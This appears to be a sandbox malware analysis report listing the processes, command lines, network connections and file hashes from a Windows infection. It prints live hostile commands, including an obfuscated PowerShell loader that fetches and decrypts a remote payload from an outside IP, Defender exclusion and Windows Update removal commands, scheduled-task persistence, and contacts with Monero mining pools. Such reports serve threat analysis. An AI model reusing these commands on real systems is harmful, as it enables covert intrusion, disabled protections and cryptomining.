C:\Users\Admin\AppData\Local\Temp\2967.exe
C:\Users\Admin\AppData\Local\Temp\2967.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\3494.exe
C:\Users\Admin\AppData\Local\Temp\3494.exe
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 716
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a5948247-5087-4f02-b4b2-8e34b6a1d297" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
"C:\Users\Admin\AppData\Local\Temp\2B4C.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4BE6.exe
C:\Users\Admin\AppData\Local\Temp\4BE6.exe
C:\Users\Admin\AppData\Local\Temp\4F90.exe
C:\Users\Admin\AppData\Local\Temp\4F90.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 780
C:\Users\Admin\AppData\Local\Temp\54B2.exe
C:\Users\Admin\AppData\Local\Temp\54B2.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
"C:\Users\Admin\AppData\Local\Temp\2B4C.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\6126.exe
C:\Users\Admin\AppData\Local\Temp\6126.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $anemoneAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $undoneBasalt = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTEwMTg=')); $urledAnemone = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y2IxYTM=')); $drollyAdopted = new-object System.Net.Sockets.TcpClient; $drollyAdopted.Connect($anemoneAccoast, [int]$undoneBasalt); $croodUndone = $drollyAdopted.GetStream(); $drollyAdopted.SendTimeout = 300000; $drollyAdopted.ReceiveTimeout = 300000; $anemoneUrled = [System.Text.StringBuilder]::new(); $anemoneUrled.AppendLine('GET /' + $urledAnemone); $anemoneUrled.AppendLine('Host: ' + $anemoneAccoast); $anemoneUrled.AppendLine(); $drollyBasalt = [System.Text.Encoding]::ASCII.GetBytes($anemoneUrled.ToString()); $croodUndone.Write($drollyBasalt, 0, $drollyBasalt.Length); $croodAnemone = New-Object System.IO.MemoryStream; $croodUndone.CopyTo($croodAnemone); $croodUndone.Dispose(); $drollyAdopted.Dispose(); $croodAnemone.Position = 0; $accoastAdopted = $croodAnemone.ToArray(); $croodAnemone.Dispose(); $adoptedUndone = [System.Text.Encoding]::ASCII.GetString($accoastAdopted).IndexOf('`r`n`r`n')+1; $urledDrolly = [System.Text.Encoding]::ASCII.GetString($accoastAdopted[$adoptedUndone..($accoastAdopted.Length-1)]); $urledDrolly = [System.Convert]::FromBase64String($urledDrolly); $adoptedTaipans = New-Object System.Security.Cryptography.AesManaged; $adoptedTaipans.Mode = [System.Security.Cryptography.CipherMode]::CBC; $adoptedTaipans.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $adoptedTaipans.Key = [System.Convert]::FromBase64String('REh1kjJGknER9Hy/8Kp1GmdthqGx+srHUlsWBbnCLIM='); $adoptedTaipans.IV = [System.Convert]::FromBase64String('biNlJbw5kJdQtvBXtmkf9A=='); $accoastBasalt = $adoptedTaipans.CreateDecryptor(); $urledDrolly = $accoastBasalt.TransformFinalBlock($urledDrolly, 0, $urledDrolly.Length); $accoastBasalt.Dispose(); $adoptedTaipans.Dispose(); $adoptedYttrium = New-Object System.IO.MemoryStream(, $urledDrolly); $urledAccoast = New-Object System.IO.MemoryStream; $yttriumTaipans = New-Object System.IO.Compression.GZipStream($adoptedYttrium, [IO.Compression.CompressionMode]::Decompress); $yttriumTaipans.CopyTo($urledAccoast); $urledDrolly = $urledAccoast.ToArray(); $anemoneBasalt = [System.Reflection.Assembly]::Load($urledDrolly); $yttriumDrolly = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dW5uZXN0U2NvdXRlcg==')); $taipansAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('YmFzYWx0QWNjb2FzdA==')); $urledAdopted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dGFpcGFuc1l0dHJpdW0=')); $urledCrood = $anemoneBasalt.GetType($yttriumDrolly + '.' + $taipansAccoast); $drollyTaipans = $urledCrood.GetMethod($urledAdopted); $drollyTaipans.Invoke($undoneUrled, (, [string[]] (''))); #($undoneUrled, $undoneUrled);
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe
"C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe"
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build3.exe
"C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe
"C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe"
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 788
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 716
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Users\Admin\AppData\Local\Temp\D415.exe
C:\Users\Admin\AppData\Local\Temp\D415.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1824
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.97.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| EE | 91.235.234.235:80 | tcp | |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| US | 20.189.173.7:443 | tcp | |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| BE | 8.238.110.126:80 | tcp | |
| NL | 5.252.118.57:80 | 5.252.118.57 | tcp |
| US | 8.8.8.8:53 | 57.118.252.5.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| KR | 211.53.230.67:80 | zexeq.com | tcp |
| MX | 187.232.218.151:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 157.240.5.12:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| DE | 157.240.20.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 151.218.232.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.230.53.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
| US | 8.8.8.8:53 | 35.20.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.31.221.154.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
| RU | 91.215.85.198:51018 | 91.215.85.198 | tcp |
| US | 8.8.8.8:53 | 198.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aapu.at | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 7.19.229.190.in-addr.arpa | udp |
| CZ | 146.19.173.221:80 | 146.19.173.221 | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 221.173.19.146.in-addr.arpa | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | hoh0aeghwugh2gie.com | udp |
| N/A | 185.161.248.41:80 | hoh0aeghwugh2gie.com | tcp |
| US | 8.8.8.8:53 | 41.248.161.185.in-addr.arpa | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | janjackfrs.com | udp |
| RU | 45.143.137.122:80 | janjackfrs.com | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.137.143.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 31.13.26.104.in-addr.arpa | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 92.222.217.165:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 165.217.222.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.69.136:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.69.15.51.in-addr.arpa | udp |
Files
memory/2424-122-0x00000000001D0000-0x00000000001D9000-memory.dmp
memory/3156-123-0x00000000005A0000-0x00000000005B6000-memory.dmp
memory/2424-124-0x0000000000400000-0x0000000002B91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\918.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\918.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\A71.exe
| MD5 | 2e9ae44f23fbf550b7e0dcfe161a1829 |
| SHA1 | b644e07519e7aac42fe4905c2bbeddc6a1c3957d |
| SHA256 | 0bafccb3ca90da20ec6582b16848f7c58f7bc2f7af3b1f15562c88942b906d0d |
| SHA512 | d5b771e262ddd4ec1266f7fcd05a16e755102bf808d22fab24ab402402980faf9ef763316f9d5921393bb5473e18e7750e28a1792dc0d5159bf015874c11f053 |
C:\Users\Admin\AppData\Local\Temp\B9B.exe
| MD5 | d8a10ec2997baf08895cbf482e904c8c |
| SHA1 | 7c58df320d1bc7d4249b6e66016f09ae4139a079 |
| SHA256 | 43cc1575c2949413764525d6298185eb8a39b9216247e7b75724ec2daadf461e |
| SHA512 | 5bde578d0634be516539fe764e2804013e8996fd357c024b5da713d15432c70a763e20909d890614bed592c3815748a450d6be136de05ae92f61ae5f22a61703 |
C:\Users\Admin\AppData\Local\Temp\B9B.exe
| MD5 | d8a10ec2997baf08895cbf482e904c8c |
| SHA1 | 7c58df320d1bc7d4249b6e66016f09ae4139a079 |
| SHA256 | 43cc1575c2949413764525d6298185eb8a39b9216247e7b75724ec2daadf461e |
| SHA512 | 5bde578d0634be516539fe764e2804013e8996fd357c024b5da713d15432c70a763e20909d890614bed592c3815748a450d6be136de05ae92f61ae5f22a61703 |
C:\Users\Admin\AppData\Local\Temp\A71.exe
| MD5 | 2e9ae44f23fbf550b7e0dcfe161a1829 |
| SHA1 | b644e07519e7aac42fe4905c2bbeddc6a1c3957d |
| SHA256 | 0bafccb3ca90da20ec6582b16848f7c58f7bc2f7af3b1f15562c88942b906d0d |
| SHA512 | d5b771e262ddd4ec1266f7fcd05a16e755102bf808d22fab24ab402402980faf9ef763316f9d5921393bb5473e18e7750e28a1792dc0d5159bf015874c11f053 |
memory/3168-142-0x00000000009B0000-0x0000000000F35000-memory.dmp
memory/3688-147-0x0000000000400000-0x0000000000425000-memory.dmp
memory/3688-153-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\11B6.exe
| MD5 | 275b48a5ff89d48f37a107c26f476b60 |
| SHA1 | b0bf6a4c89c18dbbce6def51832d612dcd0ef848 |
| SHA256 | a5d29ba11247bd34f7e82ea77af0fbc3e184ff96f4804952a1dd553c450588ae |
| SHA512 | 4a21ac8e761beefb1d5b4b55c541487a5b958ef3f5113264fe784e5de5aa1bf45fea0ad51672b1af7f314a2bafa3972c0ce678db0bbabad636f083c1f5cf63fb |
C:\Users\Admin\AppData\Local\Temp\11B6.exe
| MD5 | 275b48a5ff89d48f37a107c26f476b60 |
| SHA1 | b0bf6a4c89c18dbbce6def51832d612dcd0ef848 |
